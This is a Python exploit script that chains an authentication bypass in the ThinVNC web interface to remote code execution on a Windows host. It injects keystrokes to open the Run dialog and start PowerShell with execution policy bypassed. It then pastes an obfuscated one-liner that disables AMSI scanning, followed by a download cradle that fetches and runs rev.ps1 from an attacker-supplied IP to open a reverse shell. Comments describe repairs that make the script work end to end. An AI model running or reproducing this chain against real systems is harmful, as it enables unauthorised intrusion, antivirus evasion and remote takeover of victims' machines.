import requests
import time
import argparse
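# Every request is routed through an intercepting proxy (Burp-style listener on
# 127.0.0.1:8080). Both entries use an ``http://`` URL: the proxy itself speaks
# plain HTTP, and with urllib3 >= 1.26 an ``https://`` proxy URL (the original
# value of the 'https' key) makes requests try to open a TLS connection *to the
# proxy*, which a plain listener rejects.
proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}

# Browser-like request headers sent with every /cmd call so the traffic resembles
# the ThinVNC web client; ``Connection: close`` keeps one request per TCP session.
headers = {
    "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:98.0) Gecko/20100101 Firefox/98.0",
    "Accept": "*/*",
    "Accept-Language": "en-US,en;q=0.5",
    "Accept-Encoding": "gzip, deflate",
    "X-Requested-With": "XMLHttpRequest",
    "Connection": "close",
}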
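def login_sid(base_url, *, timeout=10):
    """Obtain a ThinVNC session id without supplying any credentials.

    Sends ``cmd=connect`` with an empty ``SID`` cookie; the server answers with a
    JSON object whose ``id`` member is a freshly issued session id (this is the
    authentication-bypass step the rest of the chain builds on).

    Args:
        base_url: ``http://host:port`` of the ThinVNC web interface, no trailing
            slash.
        timeout: per-request timeout in seconds (keyword-only). The original
            issued the request without one and could block forever on a host
            that accepts the TCP connection but never answers.

    Returns:
        The session id taken from the ``id`` key of the JSON reply.

    Raises:
        requests.HTTPError: if the server returns a non-2xx status.
        RuntimeError: if the reply is not JSON or has no ``id`` key — usually
            meaning the target is not a (vulnerable) ThinVNC instance.
    """
    url = base_url + "/cmd?cmd=connect&destAddr=poc&id=0"
    cookies = {"SID": ""}
    r = requests.get(url, headers=headers, cookies=cookies, proxies=proxies,
                     timeout=timeout)
    r.raise_for_status()
    try:
        return r.json()['id']
    except (ValueError, KeyError) as err:
        # requests' JSON error subclasses ValueError; a KeyError means the
        # endpoint answered but not with the expected session object.
        raise RuntimeError("unexpected reply to connect: %r" % r.text[:200]) from err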
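def start_sid(base_url, sid, *, timeout=10, delay=2):
    """Start a remote-desktop session for *sid* with mouse and keyboard control.

    Issues ``cmd=start`` with ``mouseControl=true&kbdControl=true`` so that the
    input-injection helpers that follow are accepted by the server.

    Args:
        base_url: ThinVNC base URL.
        sid: session id returned by ``login_sid``; sent both in the query string
            and as the ``SID`` cookie, as the web client does.
        timeout: per-request timeout in seconds (keyword-only); the original
            had none.
        delay: seconds to sleep after the request so the desktop session is up
            before keystrokes are injected (the original hard-coded 2).

    Raises:
        requests.HTTPError: if the server returns a non-2xx status — continuing
            the chain after a failed start only produces confusing results.
    """
    url = base_url + "/cmd?cmd=start&mouseControl=true&kbdControl=true&quality=85&pixelFormat=0&monitor=0&id=%s" % sid
    cookies = {"SID": "%s" % sid}
    r = requests.get(url, headers=headers, cookies=cookies, proxies=proxies,
                     timeout=timeout)
    r.raise_for_status()
    time.sleep(delay)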
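def send_ctrl_esc(base_url, sid, *, timeout=10, delay=2):
    """Inject the Ctrl+Esc function-key chord (opens the Windows Start menu).

    Args:
        base_url: ThinVNC base URL.
        sid: active session id (see ``start_sid``).
        timeout: per-request timeout in seconds (keyword-only).
        delay: seconds to wait afterwards so the menu is open before the next
            injection (the original hard-coded 2).

    Raises:
        requests.HTTPError: on a non-2xx response.
    """
    url = base_url + "/cmd?cmd=fkey&key=CtrlEsc&id=%s" % sid
    cookies = {"SID": "%s" % sid}
    r = requests.get(url, headers=headers, cookies=cookies, proxies=proxies,
                     timeout=timeout)
    r.raise_for_status()
    time.sleep(delay)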
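def send_text(base_url, sid, text, *, timeout=10, delay=2):
    """Push *text* into the remote clipboard and paste it into the focused window.

    Uses ``cmd=cli&type=clipboard&action=paste`` with *text* as the raw POST
    body, so the whole string lands at once instead of being typed key by key.

    Args:
        base_url: ThinVNC base URL.
        sid: active session id.
        text: string to paste; sent verbatim as the request body.
        timeout: per-request timeout in seconds (keyword-only).
        delay: seconds to wait after the paste (the original hard-coded 2).

    Raises:
        requests.HTTPError: on a non-2xx response.
    """
    url = base_url + "/cmd?id=%s&cmd=cli&type=clipboard&action=paste" % sid
    cookies = {"SID": "%s" % sid}
    r = requests.post(url, headers=headers, cookies=cookies, proxies=proxies,
                      data=text, timeout=timeout)
    r.raise_for_status()
    time.sleep(delay)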
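def send_enter(base_url, sid, *, timeout=10, delay=2):
    """Inject a key-down event for key code 13 (Enter) into the session.

    Args:
        base_url: ThinVNC base URL.
        sid: active session id.
        timeout: per-request timeout in seconds (keyword-only).
        delay: seconds to wait afterwards so the remote side processes the
            keystroke before the next step (the original hard-coded 2).

    Raises:
        requests.HTTPError: on a non-2xx response.
    """
    url = base_url + "/cmd?cmd=keyb&key=13&char=0&action=down&id=%s" % sid
    cookies = {"SID": "%s" % sid}
    r = requests.get(url, headers=headers, cookies=cookies, proxies=proxies,
                     timeout=timeout)
    r.raise_for_status()
    time.sleep(delay)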
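def main():
    """Drive the ThinVNC auth-bypass -> RCE chain from the command line.

    Steps (each helper sleeps briefly so the remote desktop keeps up): obtain an
    unauthenticated session id, start a desktop session with keyboard/mouse
    control, press Ctrl+Esc, paste ``run`` + Enter to open the Run dialog,
    launch ``powershell.exe -exec bypass``, paste an obfuscated AMSI-disable
    one-liner, then paste a download cradle that fetches ``rev.ps1`` from the
    attacker host and runs it.

    Fixes relative to the original script: the stager URL used a literal
    ``<attacker>`` placeholder and never consumed ``--reverse-ip``; the bare
    ``print`` on its own line was a Python 2 leftover that printed nothing.
    """
    global proxies

    parser = argparse.ArgumentParser(description='ThinVNC exploit')
    parser.add_argument('-s', '--server-ip', required=True, help='ThinVNC IP')
    parser.add_argument('-p', '--server-port', required=True, help='ThinVNC PORT')
    parser.add_argument('-r', '--reverse-ip', required=True, help='Reverse Shell IP')
    # --reverse-port is kept for compatibility; the script itself does not use it
    # (presumably rev.ps1 carries the listener port — confirm against your stager).
    parser.add_argument('-a', '--reverse-port', required=True, help='Reverse Shell PORT')
    parser.add_argument('--stager-port', default='8002',
                        help='port on --reverse-ip that serves rev.ps1 (default: 8002)')
    parser.add_argument('--proxy', default='http://127.0.0.1:8080',
                        help="HTTP proxy for all requests; pass '' to disable "
                             "(default: intercepting proxy on 127.0.0.1:8080)")
    args = parser.parse_args()

    # The helpers read the module-level ``proxies`` at call time, so rebinding it
    # here honours --proxy; None lets requests fall back to the environment.
    if args.proxy:
        proxies = {'http': args.proxy, 'https': args.proxy}
    else:
        proxies = None

    url = 'http://%s:%s' % (args.server_ip, args.server_port)
    print("[*] ThinVNC Auth Bypass to RCE exploit")
    print()
    print("[+] Getting sid")
    sid = login_sid(url)
    print("[+] Initializing sid")
    start_sid(url, sid)
    print("[+] Sending Ctrl+Esc sid")
    send_ctrl_esc(url, sid)
    print("[+] Opening run")
    send_text(url, sid, "run")
    send_enter(url, sid)
    print("[+] Sending Reverse Shell")
    send_text(url, sid, "powershell.exe -exec bypass")
    send_enter(url, sid)
    # Obfuscated PowerShell that reflectively sets AmsiUtils.amsiInitFailed to
    # $true so later script content is not scanned; kept byte-for-byte.
    amsi_txt = """S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )"""
    send_text(url, sid, amsi_txt)
    send_enter(url, sid)
    # Download cradle: plain HTTP from the attacker host, so it must be serving
    # rev.ps1 on --stager-port before this point is reached.
    rev_shell_txt = ("IEX((New-Object System.Net.WebClient)"
                     ".DownloadString('http://%s:%s/rev.ps1'))"
                     % (args.reverse_ip, args.stager_port))
    send_text(url, sid, rev_shell_txt)
    send_enter(url, sid)


if __name__ == "__main__":
    main()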